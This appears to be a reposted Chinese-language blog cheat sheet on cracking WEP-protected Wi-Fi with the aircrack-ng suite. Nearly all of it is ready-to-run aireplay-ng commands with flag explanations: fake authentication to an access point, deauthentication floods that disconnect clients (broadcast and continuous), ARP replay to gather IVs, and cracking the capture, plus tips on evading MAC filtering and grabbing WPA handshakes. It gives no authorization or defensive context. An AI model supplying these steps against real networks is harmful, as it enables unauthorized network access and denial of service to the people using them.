WEP破解全部需要首先伪造认证,以便与AP进行正常通信
不产生arp数据包
aireplay-ng -1 0 -e kifi <AP MAC> -h <YOUR MAC> <INTERFACE>
Aireplay-ng -1 60 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <YOUR MAC> <INTERFACE>
每6000秒能发送reauthentication(默认是发送三次)
-o 1 每次身份认证只发一组认证数据包
-q 10 每10秒发keep-live帧
某些AP验证客户端MAC地址OUI(前三个字节)
MAC地址过滤
Denied(code 1) is WPA in use
WPA/WPA2不支持Fake authentication
使用真实MAC地址
物理靠近AP
侦听信道正确
DEAUTHENTICATION
强制客户端与AP断开连接
重连生成ARP请求,AP回包包含IV
WPA重连过程中抓取四步握手过程
无客户端情况下此攻击无效
Aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface name>
不指定-c 参数时候,以广播包攻击所有客户端
每攻击发送128个包,64个给AP,64个给客户端
物理足够接近被攻击者
-0 0(一直发送数据包)
物理足够接近被攻击者
与被攻击者使用相同的无线标准
客户端可能拒绝广播帧,建议指定客户端
ARP重放
侦听正常的ARP包并重放给AP
AP回包中包含大量弱IV
Aireplay-ng -3 -b <AP MAC> -h <attacker MAC> <interface name>
-h 合法客户端/供给者mac
Airodump-ng data字段
64bit密钥:25万
128bit密钥:150万
Airecrack-ng wep.cap
原文地址:https://blog.csdn.net/qq_23217779/article/details/88876553
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。